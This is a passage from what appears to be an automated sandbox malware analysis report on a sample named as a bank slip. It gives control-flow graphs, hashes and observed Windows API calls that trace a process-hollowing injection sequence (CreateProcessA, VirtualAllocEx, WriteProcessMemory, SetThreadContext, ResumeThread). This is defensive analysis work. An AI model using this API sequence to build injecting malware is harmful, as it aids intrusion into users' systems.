426->427 434 7660853 427->434 435 766084e 427->435 430 7660785-76607a6 428->430 431 766077d-7660781 428->431 436 7660857 429->436 438 76607ad-76607b1 430->438 439 76607a8 430->439 431->430 432->433 440 7660dd3-7660e13 432->440 441 7660d90-7660dce 432->441 442 7660e5b-7660e9b 432->442 443 7660e18-7660e56 432->443 453 7660ee0 433->453 434->436 435->434 436->354 438->421 439->438 440->453 441->453 442->453 443->453 460 7660fba-7661061 451->460 452->460 453->422 460->349 465->324 466->324
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.1783896478.0000000007660000.00000040.00000800.00020000.00000000.sdmp, Offset: 07660000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_7660000_PO1268931024 - Bank Slip.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID: 4'tq$TJyq$Tetq$pxq$xbwq
                                                                                                        • API String ID: 0-3259335386
                                                                                                        • Opcode ID: c281e7f7a2ad5502d38c67cd7b39818a103e1f6385e5cad4c08f7679ccb1dd28
                                                                                                        • Instruction ID: 099cbf2759b72294f00d61c93fe1f6175a32d5e26d4f7cb0fdd34fe37a3aa71c
                                                                                                        • Opcode Fuzzy Hash: c281e7f7a2ad5502d38c67cd7b39818a103e1f6385e5cad4c08f7679ccb1dd28
                                                                                                        • Instruction Fuzzy Hash: E8B2C175E00229DFDB64CF69C984AD9BBB2FF89300F1481E9D509AB265DB319E81CF40

                                                                                                        Control-flow Graph

                                                                                                        • Executed
                                                                                                        • Not Executed
                                                                                                        control_flow_graph 467 2f7d3e8-2f7d487 GetCurrentProcess 471 2f7d490-2f7d4c4 GetCurrentThread 467->471 472 2f7d489-2f7d48f 467->472 473 2f7d4c6-2f7d4cc 471->473 474 2f7d4cd-2f7d501 GetCurrentProcess 471->474 472->471 473->474 476 2f7d503-2f7d509 474->476 477 2f7d50a-2f7d525 call 2f7d5c9 474->477 476->477 480 2f7d52b-2f7d55a GetCurrentThreadId 477->480 481 2f7d563-2f7d5c5 480->481 482 2f7d55c-2f7d562 480->482 482->481
                                                                                                        APIs
                                                                                                        • GetCurrentProcess.KERNEL32 ref: 02F7D476
                                                                                                        • GetCurrentThread.KERNEL32 ref: 02F7D4B3
                                                                                                        • GetCurrentProcess.KERNEL32 ref: 02F7D4F0
                                                                                                        • GetCurrentThreadId.KERNEL32 ref: 02F7D549
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.1769450539.0000000002F70000.00000040.00000800.00020000.00000000.sdmp, Offset: 02F70000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_2f70000_PO1268931024 - Bank Slip.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: Current$ProcessThread
                                                                                                        • String ID:
                                                                                                        • API String ID: 2063062207-0
                                                                                                        • Opcode ID: 5385c1c02f88b863638027dcc86aa43c30eb92d1fe6584b1a54c28c5d9c0f844
                                                                                                        • Instruction ID: 13455b489ab7678f5c4ba726acc8c36d9246a45d4c6350cece7d9cd69da53acc
                                                                                                        • Opcode Fuzzy Hash: 5385c1c02f88b863638027dcc86aa43c30eb92d1fe6584b1a54c28c5d9c0f844
                                                                                                        • Instruction Fuzzy Hash: C15155B0D016498FCB58DFAAC648BDEBBF1AF88314F24845AE009A7290D7345984CB61

                                                                                                        Control-flow Graph

                                                                                                        • Executed
                                                                                                        • Not Executed
                                                                                                        control_flow_graph 489 2f7d3f8-2f7d487 GetCurrentProcess 493 2f7d490-2f7d4c4 GetCurrentThread 489->493 494 2f7d489-2f7d48f 489->494 495 2f7d4c6-2f7d4cc 493->495 496 2f7d4cd-2f7d501 GetCurrentProcess 493->496 494->493 495->496 498 2f7d503-2f7d509 496->498 499 2f7d50a-2f7d525 call 2f7d5c9 496->499 498->499 502 2f7d52b-2f7d55a GetCurrentThreadId 499->502 503 2f7d563-2f7d5c5 502->503 504 2f7d55c-2f7d562 502->504 504->503
                                                                                                        APIs
                                                                                                        • GetCurrentProcess.KERNEL32 ref: 02F7D476
                                                                                                        • GetCurrentThread.KERNEL32 ref: 02F7D4B3
                                                                                                        • GetCurrentProcess.KERNEL32 ref: 02F7D4F0
                                                                                                        • GetCurrentThreadId.KERNEL32 ref: 02F7D549
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.1769450539.0000000002F70000.00000040.00000800.00020000.00000000.sdmp, Offset: 02F70000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_2f70000_PO1268931024 - Bank Slip.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: Current$ProcessThread
                                                                                                        • String ID:
                                                                                                        • API String ID: 2063062207-0
                                                                                                        • Opcode ID: c332aa5cceb4f6df1eb0fd22db360eb54c9c2a26b7e72c6935e789184690fd47
                                                                                                        • Instruction ID: deca25ba4515d0536a6fdd0665312faedda436c239075fa6d8c7d6e9b2af04b8
                                                                                                        • Opcode Fuzzy Hash: c332aa5cceb4f6df1eb0fd22db360eb54c9c2a26b7e72c6935e789184690fd47
                                                                                                        • Instruction Fuzzy Hash: CB5165B0D00649CFDB58DFAAD648B9EBBF1EF8C314F24845AE409A7390D7346984CB65

                                                                                                        Control-flow Graph

                                                                                                        • Executed
                                                                                                        • Not Executed
                                                                                                        control_flow_graph 535 766f336-766f3d5 538 766f3d7-766f3e1 535->538 539 766f40e-766f42e 535->539 538->539 540 766f3e3-766f3e5 538->540 546 766f467-766f496 539->546 547 766f430-766f43a 539->547 541 766f3e7-766f3f1 540->541 542 766f408-766f40b 540->542 544 766f3f5-766f404 541->544 545 766f3f3 541->545 542->539 544->544 548 766f406 544->548 545->544 553 766f4cf-766f589 CreateProcessA 546->553 554 766f498-766f4a2 546->554 547->546 549 766f43c-766f43e 547->549 548->542 551 766f440-766f44a 549->551 552 766f461-766f464 549->552 555 766f44e-766f45d 551->555 556 766f44c 551->556 552->546 567 766f592-766f618 553->567 568 766f58b-766f591 553->568 554->553 558 766f4a4-766f4a6 554->558 555->555 557 766f45f 555->557 556->555 557->552 559 766f4a8-766f4b2 558->559 560 766f4c9-766f4cc 558->560 562 766f4b6-766f4c5 559->562 563 766f4b4 559->563 560->553 562->562 565 766f4c7 562->565 563->562 565->560 578 766f61a-766f61e 567->578 579 766f628-766f62c 567->579 568->567 578->579 580 766f620 578->580 581 766f62e-766f632 579->581 582 766f63c-766f640 579->582 580->579 581->582 583 766f634 581->583 584 766f642-766f646 582->584 585 766f650-766f654 582->585 583->582 584->585 586 766f648 584->586 587 766f666-766f66d 585->587 588 766f656-766f65c 585->588 586->585 589 766f684 587->589 590 766f66f-766f67e 587->590 588->587 592 766f685 589->592 590->589 592->592
                                                                                                        APIs
                                                                                                        • CreateProcessA.KERNELBASE(?,?,?,?,?,?,?,?,?,?), ref: 0766F576
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.1783896478.0000000007660000.00000040.00000800.00020000.00000000.sdmp, Offset: 07660000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_7660000_PO1268931024 - Bank Slip.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: CreateProcess
                                                                                                        • String ID:
                                                                                                        • API String ID: 963392458-0
                                                                                                        • Opcode ID: 76b0b00a681959f939efcf4a36b8aef3c3a1f7f3c039c64123eae5051779b6d1
                                                                                                        • Instruction ID: 5ad4858a5d7d868a1214d62172b3bbba45161232fd6aa752b59f1c95231d741d
                                                                                                        • Opcode Fuzzy Hash: 76b0b00a681959f939efcf4a36b8aef3c3a1f7f3c039c64123eae5051779b6d1
                                                                                                        • Instruction Fuzzy Hash: F2917BB1D0021ACFDB20CF68D845BEDBBB2BF48314F54856AE809B7290DB749985CF91

                                                                                                        Control-flow Graph

                                                                                                        • Executed
                                                                                                        • Not Executed
                                                                                                        control_flow_graph 593 766f340-766f3d5 595 766f3d7-766f3e1 593->595 596 766f40e-766f42e 593->596 595->596 597 766f3e3-766f3e5 595->597 603 766f467-766f496 596->603 604 766f430-766f43a 596->604 598 766f3e7-766f3f1 597->598 599 766f408-766f40b 597->599 601 766f3f5-766f404 598->601 602 766f3f3 598->602 599->596 601->601 605 766f406 601->605 602->601 610 766f4cf-766f589 CreateProcessA 603->610 611 766f498-766f4a2 603->611 604->603 606 766f43c-766f43e 604->606 605->599 608 766f440-766f44a 606->608 609 766f461-766f464 606->609 612 766f44e-766f45d 608->612 613 766f44c 608->613 609->603 624 766f592-766f618 610->624 625 766f58b-766f591 610->625 611->610 615 766f4a4-766f4a6 611->615 612->612 614 766f45f 612->614 613->612 614->609 616 766f4a8-766f4b2 615->616 617 766f4c9-766f4cc 615->617 619 766f4b6-766f4c5 616->619 620 766f4b4 616->620 617->610 619->619 622 766f4c7 619->622 620->619 622->617 635 766f61a-766f61e 624->635 636 766f628-766f62c 624->636 625->624 635->636 637 766f620 635->637 638 766f62e-766f632 636->638 639 766f63c-766f640 636->639 637->636 638->639 640 766f634 638->640 641 766f642-766f646 639->641 642 766f650-766f654 639->642 640->639 641->642 643 766f648 641->643 644 766f666-766f66d 642->644 645 766f656-766f65c 642->645 643->642 646 766f684 644->646 647 766f66f-766f67e 644->647 645->644 649 766f685 646->649 647->646 649->649
                                                                                                        APIs
                                                                                                        • CreateProcessA.KERNELBASE(?,?,?,?,?,?,?,?,?,?), ref: 0766F576
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.1783896478.0000000007660000.00000040.00000800.00020000.00000000.sdmp, Offset: 07660000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_7660000_PO1268931024 - Bank Slip.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: CreateProcess
                                                                                                        • String ID:
                                                                                                        • API String ID: 963392458-0
                                                                                                        • Opcode ID: e0c5cb44c3078f85ba5708d461a920e4783806f602dd80a3edb9b817e57d68e2
                                                                                                        • Instruction ID: cba74ceb57affe255138d7c66411eabb09fead09aedae5fd66bde45c00c07636
                                                                                                        • Opcode Fuzzy Hash: e0c5cb44c3078f85ba5708d461a920e4783806f602dd80a3edb9b817e57d68e2
                                                                                                        • Instruction Fuzzy Hash: 2E916AB1D0021ACFDB20CF68D845BEDBBB2BF48314F54856AE809A7290DB749985CF91

                                                                                                        Control-flow Graph

                                                                                                        • Executed
                                                                                                        • Not Executed
                                                                                                        control_flow_graph 650 2f7ad68-2f7ad77 651 2f7ada3-2f7ada7 650->651 652 2f7ad79-2f7ad86 call 2f7a0c0 650->652 653 2f7adbb-2f7adfc 651->653 654 2f7ada9-2f7adb3 651->654 659 2f7ad9c 652->659 660 2f7ad88 652->660 661 2f7adfe-2f7ae06 653->661 662 2f7ae09-2f7ae17 653->662 654->653 659->651 707 2f7ad8e call 2f7aff0 660->707 708 2f7ad8e call 2f7b000 660->708 661->662 663 2f7ae3b-2f7ae3d 662->663 664 2f7ae19-2f7ae1e 662->664 666 2f7ae40-2f7ae47 663->666 667 2f7ae20-2f7ae27 call 2f7a0cc 664->667 668 2f7ae29 664->668 665 2f7ad94-2f7ad96 665->659 669 2f7aed8-2f7af54 665->669 670 2f7ae54-2f7ae5b 666->670 671 2f7ae49-2f7ae51 666->671 673 2f7ae2b-2f7ae39 667->673 668->673 700 2f7af56-2f7af7e 669->700 701 2f7af80-2f7af98 669->701 674 2f7ae5d-2f7ae65 670->674 675 2f7ae68-2f7ae6a call 2f7a0dc 670->675 671->670 673->666 674->675 679 2f7ae6f-2f7ae71 675->679 681 2f7ae73-2f7ae7b 679->681 682 2f7ae7e-2f7ae83 679->682 681->682 683 2f7ae85-2f7ae8c 682->683 684 2f7aea1-2f7aeae 682->684 683->684 686 2f7ae8e-2f7ae9e call 2f7a0ec call 2f7a0fc 683->686 690 2f7aed1-2f7aed7 684->690 691 2f7aeb0-2f7aece 684->691 686->684 691->690 700->701 702 2f7afa0-2f7afcb GetModuleHandleW 701->702 703 2f7af9a-2f7af9d 701->703 704 2f7afd4-2f7afe8 702->704 705 2f7afcd-2f7afd3 702->705 703->702 705->704 707->665 708->665
                                                                                                        APIs
                                                                                                        • GetModuleHandleW.KERNELBASE(00000000), ref: 02F7AFBE
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.1769450539.0000000002F70000.00000040.00000800.00020000.00000000.sdmp, Offset: 02F70000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_2f70000_PO1268931024 - Bank Slip.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: HandleModule
                                                                                                        • String ID:
                                                                                                        • API String ID: 4139908857-0
                                                                                                        • Opcode ID: d1efc33e9051217a8db6e1d65d4fee8e324c9387f31eeb0317a812848e3d9cc8
                                                                                                        • Instruction ID: 796129e8f0528b6a5100848ce9529097c3a1157bd97625153205b279fcf9f763
                                                                                                        • Opcode Fuzzy Hash: d1efc33e9051217a8db6e1d65d4fee8e324c9387f31eeb0317a812848e3d9cc8
                                                                                                        • Instruction Fuzzy Hash: D88167B0A00B058FD724DF6AD54079ABBF2FF88344F01892ED58ADBA50D775E846CB90

                                                                                                        Control-flow Graph

                                                                                                        • Executed
                                                                                                        • Not Executed
                                                                                                        control_flow_graph 709 2f7590c-2f75916 710 2f75918-2f759d9 CreateActCtxA 709->710 712 2f759e2-2f75a3c 710->712 713 2f759db-2f759e1 710->713 720 2f75a3e-2f75a41 712->720 721 2f75a4b-2f75a4f 712->721 713->712 720->721 722 2f75a51-2f75a5d 721->722 723 2f75a60-2f75a90 721->723 722->723 727 2f75a42 723->727 728 2f75a92-2f75a97 723->728 730 2f75a44 727->730 731 2f75ab2-2f75ab7 727->731 729 2f75b09-2f75b14 728->729 730->721 731->729
                                                                                                        APIs
                                                                                                        • CreateActCtxA.KERNEL32(?), ref: 02F759C9
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.1769450539.0000000002F70000.00000040.00000800.00020000.00000000.sdmp, Offset: 02F70000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_2f70000_PO1268931024 - Bank Slip.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: Create
                                                                                                        • String ID:
                                                                                                        • API String ID: 2289755597-0
                                                                                                        • Opcode ID: f4ab3f5517522785e136912a2efbd80283b5da3ad54b80550ca333b109055193
                                                                                                        • Instruction ID: fb4dde68a9de936a7038cc27925e409f9cc578707797fa3fb606ab21a40cedff
                                                                                                        • Opcode Fuzzy Hash: f4ab3f5517522785e136912a2efbd80283b5da3ad54b80550ca333b109055193
                                                                                                        • Instruction Fuzzy Hash: F441E4B0C00759CFDB24CFA9C884B8DBBF6BF49304F64806AD408AB251DB756945CF90

                                                                                                        Control-flow Graph

                                                                                                        • Executed
                                                                                                        • Not Executed
                                                                                                        control_flow_graph 732 2f744e0-2f759d9 CreateActCtxA 735 2f759e2-2f75a3c 732->735 736 2f759db-2f759e1 732->736 743 2f75a3e-2f75a41 735->743 744 2f75a4b-2f75a4f 735->744 736->735 743->744 745 2f75a51-2f75a5d 744->745 746 2f75a60-2f75a90 744->746 745->746 750 2f75a42 746->750 751 2f75a92-2f75a97 746->751 753 2f75a44 750->753 754 2f75ab2-2f75ab7 750->754 752 2f75b09-2f75b14 751->752 753->744 754->752
                                                                                                        APIs
                                                                                                        • CreateActCtxA.KERNEL32(?), ref: 02F759C9
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.1769450539.0000000002F70000.00000040.00000800.00020000.00000000.sdmp, Offset: 02F70000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_2f70000_PO1268931024 - Bank Slip.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: Create
                                                                                                        • String ID:
                                                                                                        • API String ID: 2289755597-0
                                                                                                        • Opcode ID: 275b3d7edb22cab2134fbf07b8016ac93376e9f9e281d5f8d6f056f424b0dc7d
                                                                                                        • Instruction ID: 6e90eaa8762e4005b53df8d2a856c689cc19fbe5c41682df6d819b6d51212d30
                                                                                                        • Opcode Fuzzy Hash: 275b3d7edb22cab2134fbf07b8016ac93376e9f9e281d5f8d6f056f424b0dc7d
                                                                                                        • Instruction Fuzzy Hash: AE41D1B0D0061DCFEB24CFA9C884BDDBBB6BF48304F60816AD908AB251DB756945CF90

                                                                                                        Control-flow Graph

                                                                                                        • Executed
                                                                                                        • Not Executed
                                                                                                        control_flow_graph 755 2f7d701-2f7d708 756 2f7d6c4-2f7d6d4 DuplicateHandle 755->756 757 2f7d70a-2f7d82e 755->757 758 2f7d6d6-2f7d6dc 756->758 759 2f7d6dd-2f7d6fa 756->759 758->759
                                                                                                        APIs
                                                                                                        • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 02F7D6C7
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.1769450539.0000000002F70000.00000040.00000800.00020000.00000000.sdmp, Offset: 02F70000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_2f70000_PO1268931024 - Bank Slip.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: DuplicateHandle
                                                                                                        • String ID:
                                                                                                        • API String ID: 3793708945-0
                                                                                                        • Opcode ID: 17978bcb064f6e59d7a6665581db63c50d5192c63a4824ecb805b52df448e3d8
                                                                                                        • Instruction ID: 4e90fa3c4eb9603cf795037920855c692847a64ad7e08066dc8aae4d00db9bc1
                                                                                                        • Opcode Fuzzy Hash: 17978bcb064f6e59d7a6665581db63c50d5192c63a4824ecb805b52df448e3d8
                                                                                                        • Instruction Fuzzy Hash: 9431C175A013848FEB48EF61F8457B93BA2F788755F118069EA218B7D4CAB91885CF11

                                                                                                        Control-flow Graph

                                                                                                        • Executed
                                                                                                        • Not Executed
                                                                                                        control_flow_graph 774 766f0b0-766f106 777 766f116-766f155 WriteProcessMemory 774->777 778 766f108-766f114 774->778 780 766f157-766f15d 777->780 781 766f15e-766f18e 777->781 778->777 780->781
                                                                                                        APIs
                                                                                                        • WriteProcessMemory.KERNELBASE(?,?,00000000,?,?), ref: 0766F148
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.1783896478.0000000007660000.00000040.00000800.00020000.00000000.sdmp, Offset: 07660000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_7660000_PO1268931024 - Bank Slip.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: MemoryProcessWrite
                                                                                                        • String ID:
                                                                                                        • API String ID: 3559483778-0
                                                                                                        • Opcode ID: a3292ee6db2024deaa4ab11f39265689f354299b3cc1536fe1a88534acf35058
                                                                                                        • Instruction ID: 203f3a027d085c3431605efd461e619695486073527bf2dd4c6242d27914a8bb
                                                                                                        • Opcode Fuzzy Hash: a3292ee6db2024deaa4ab11f39265689f354299b3cc1536fe1a88534acf35058
                                                                                                        • Instruction Fuzzy Hash: BF2148B59002499FCB10CFAAD845BEEBBF5FF48324F508429E519A7240C7799941CBA0

                                                                                                        Control-flow Graph

                                                                                                        • Executed
                                                                                                        • Not Executed
                                                                                                        control_flow_graph 785 766f0b8-766f106 787 766f116-766f155 WriteProcessMemory 785->787 788 766f108-766f114 785->788 790 766f157-766f15d 787->790 791 766f15e-766f18e 787->791 788->787 790->791
                                                                                                        APIs
                                                                                                        • WriteProcessMemory.KERNELBASE(?,?,00000000,?,?), ref: 0766F148
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.1783896478.0000000007660000.00000040.00000800.00020000.00000000.sdmp, Offset: 07660000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_7660000_PO1268931024 - Bank Slip.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: MemoryProcessWrite
                                                                                                        • String ID:
                                                                                                        • API String ID: 3559483778-0
                                                                                                        • Opcode ID: 2963e78fd71b3e07a348dad64de24606f525dc30f97810b929787b6d5a992b0f
                                                                                                        • Instruction ID: 7b68f28880064bef14531e1397e312360dfd00c456ce19109259d52b2bfe6321
                                                                                                        • Opcode Fuzzy Hash: 2963e78fd71b3e07a348dad64de24606f525dc30f97810b929787b6d5a992b0f
                                                                                                        • Instruction Fuzzy Hash: 272127B19003599FDB10CFAAC885BEEBBF5FF48320F508429E919A7240D7799944CBA0

                                                                                                        Control-flow Graph

                                                                                                        • Executed
                                                                                                        • Not Executed
                                                                                                        control_flow_graph 795 766ef19-766ef6b 798 766ef6d-766ef79 795->798 799 766ef7b-766efab Wow64SetThreadContext 795->799 798->799 801 766efb4-766efe4 799->801 802 766efad-766efb3 799->802 802->801
                                                                                                        APIs
                                                                                                        • Wow64SetThreadContext.KERNEL32(?,00000000), ref: 0766EF9E
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.1783896478.0000000007660000.00000040.00000800.00020000.00000000.sdmp, Offset: 07660000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_7660000_PO1268931024 - Bank Slip.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: ContextThreadWow64
                                                                                                        • String ID:
                                                                                                        • API String ID: 983334009-0
                                                                                                        • Opcode ID: dda6f63dd69c2e196b6f509b62e3c4ec569e33fb2436e22310b2176b2634c4a9
                                                                                                        • Instruction ID: 40457e8534861776a6aae028de7451b3c03a2bd4f930a6585aa058f1b36a786a
                                                                                                        • Opcode Fuzzy Hash: dda6f63dd69c2e196b6f509b62e3c4ec569e33fb2436e22310b2176b2634c4a9
                                                                                                        • Instruction Fuzzy Hash: A2216AB5D002098FDB10DFAAC4857EEBBF4EF88324F54842AE419A7240DB799945CFA1

                                                                                                        Control-flow Graph

                                                                                                        • Executed
                                                                                                        • Not Executed
                                                                                                        control_flow_graph 806 766f1a0-766f235 ReadProcessMemory 809 766f237-766f23d 806->809 810 766f23e-766f26e 806->810 809->810
                                                                                                        APIs
                                                                                                        • ReadProcessMemory.KERNELBASE(?,?,?,?,?), ref: 0766F228
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.1783896478.0000000007660000.00000040.00000800.00020000.00000000.sdmp, Offset: 07660000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_7660000_PO1268931024 - Bank Slip.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: MemoryProcessRead
                                                                                                        • String ID:
                                                                                                        • API String ID: 1726664587-0
                                                                                                        • Opcode ID: f3ad9508e954b6988a14c27ba9c8de21d3ae505831889e685725d2bf6427efa7
                                                                                                        • Instruction ID: 519c0e31b7fc20a93851e66c4a46f002d6afcdd9d095292b1dfb07749e7e3317
                                                                                                        • Opcode Fuzzy Hash: f3ad9508e954b6988a14c27ba9c8de21d3ae505831889e685725d2bf6427efa7
                                                                                                        • Instruction Fuzzy Hash: D42159B5C002599FCB10DFAAD884AEEFBF5FF48320F50842AE519A7240D7799945CFA0
                                                                                                        APIs
                                                                                                        • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 02F7D6C7
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.1769450539.0000000002F70000.00000040.00000800.00020000.00000000.sdmp, Offset: 02F70000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_2f70000_PO1268931024 - Bank Slip.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: DuplicateHandle
                                                                                                        • String ID:
                                                                                                        • API String ID: 3793708945-0
                                                                                                        • Opcode ID: ffbc57b3dbf7cc701553f04038a073de957f309e204792dd5196705c6a29bd20
                                                                                                        • Instruction ID: a735eb0883d65a98e31857ad7ffae34ad68454632b8e2ff529831d86dc37db31
                                                                                                        • Opcode Fuzzy Hash: ffbc57b3dbf7cc701553f04038a073de957f309e204792dd5196705c6a29bd20
                                                                                                        • Instruction Fuzzy Hash: BB21B3B5D00249DFDB10CF9AD984AEEBBF5EF48320F14845AE918A7250D378A944CF65
                                                                                                        APIs
                                                                                                        • ReadProcessMemory.KERNELBASE(?,?,?,?,?), ref: 0766F228
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.1783896478.0000000007660000.00000040.00000800.00020000.00000000.sdmp, Offset: 07660000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_7660000_PO1268931024 - Bank Slip.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: MemoryProcessRead
                                                                                                        • String ID:
                                                                                                        • API String ID: 1726664587-0
                                                                                                        • Opcode ID: a785909046a3b89dbc287fb77afad082a8a871796cfa872ae871b7783d264bd0
                                                                                                        • Instruction ID: 2ebbd9a2c757c29885687bd67e0a255e8cc7a6b658c3d0a683c6c95dd47bcc4c
                                                                                                        • Opcode Fuzzy Hash: a785909046a3b89dbc287fb77afad082a8a871796cfa872ae871b7783d264bd0
                                                                                                        • Instruction Fuzzy Hash: A52139B1C002599FDB10DFAAD844AEEFBF5FF48320F508429E519A7240D7799904CFA0
                                                                                                        APIs
                                                                                                        • Wow64SetThreadContext.KERNEL32(?,00000000), ref: 0766EF9E
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.1783896478.0000000007660000.00000040.00000800.00020000.00000000.sdmp, Offset: 07660000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_7660000_PO1268931024 - Bank Slip.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: ContextThreadWow64
                                                                                                        • String ID:
                                                                                                        • API String ID: 983334009-0
                                                                                                        • Opcode ID: 36549fc168e9fb9fb40a44185123028cc2588a973847b2eaa69870fd7dbab5c0
                                                                                                        • Instruction ID: 257a69a6e26dc63619a95f6e3f2619f7dcda731cdbf7b90147969252c44b7416
                                                                                                        • Opcode Fuzzy Hash: 36549fc168e9fb9fb40a44185123028cc2588a973847b2eaa69870fd7dbab5c0
                                                                                                        • Instruction Fuzzy Hash: 4A2138B5D002098FDB10DFAAC485BAEBBF4EF88324F548429D419A7240DB799945CFA1
                                                                                                        APIs
                                                                                                        • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 02F7D6C7
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.1769450539.0000000002F70000.00000040.00000800.00020000.00000000.sdmp, Offset: 02F70000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_2f70000_PO1268931024 - Bank Slip.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: DuplicateHandle
                                                                                                        • String ID:
                                                                                                        • API String ID: 3793708945-0
                                                                                                        • Opcode ID: 1a8271eeb8ce762cf217e45e119da1bf55b0be18f394cc907718c69a8c64c6dc
                                                                                                        • Instruction ID: c01c4274427f4267298dbce6d89744116cef0d031ff71ec2ade0faa7095eb479
                                                                                                        • Opcode Fuzzy Hash: 1a8271eeb8ce762cf217e45e119da1bf55b0be18f394cc907718c69a8c64c6dc
                                                                                                        • Instruction Fuzzy Hash: 0921B3B59002489FDB10CF9AD984ADEBBF9EB48320F14841AE918A7250D375A944CFA5
                                                                                                        APIs
                                                                                                        • VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 0766F066
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.1783896478.0000000007660000.00000040.00000800.00020000.00000000.sdmp, Offset: 07660000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_7660000_PO1268931024 - Bank Slip.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: AllocVirtual
                                                                                                        • String ID:
                                                                                                        • API String ID: 4275171209-0
                                                                                                        • Opcode ID: e24927058d4eeffdf406804533eba7f557a4e9ab3fd39bf2ece5973c02e292ca
                                                                                                        • Instruction ID: 277ee597824760842dbe0cc4ce8838e6fc5ff59d8b7a757c56579af1c67f5585
                                                                                                        • Opcode Fuzzy Hash: e24927058d4eeffdf406804533eba7f557a4e9ab3fd39bf2ece5973c02e292ca
                                                                                                        • Instruction Fuzzy Hash: 00116A759002899FCB10DFAAC844BEEFFF5EF89320F148419E519A7250CB75A940CFA0
                                                                                                        APIs
                                                                                                        • VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 0766F066
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.1783896478.0000000007660000.00000040.00000800.00020000.00000000.sdmp, Offset: 07660000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_7660000_PO1268931024 - Bank Slip.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: AllocVirtual
                                                                                                        • String ID:
                                                                                                        • API String ID: 4275171209-0
                                                                                                        • Opcode ID: 01290724e7e867fbec9c6f538693ac09235c185155b106fc04f90a55ba4b2d40
                                                                                                        • Instruction ID: cf3a40ef06c647e1a9e928bc39bc8abe3546c5adb2620f8e968e01288d84e75c
                                                                                                        • Opcode Fuzzy Hash: 01290724e7e867fbec9c6f538693ac09235c185155b106fc04f90a55ba4b2d40
                                                                                                        • Instruction Fuzzy Hash: BB1137719002499FDB10DFAAC844AEEBFF5EF88320F148819E519A7250CB75A944CFA0
                                                                                                        APIs
                                                                                                        • ResumeThread.KERNELBASE(73013C05), ref: 0766EED2
                                                                                                        Memory Dump Source
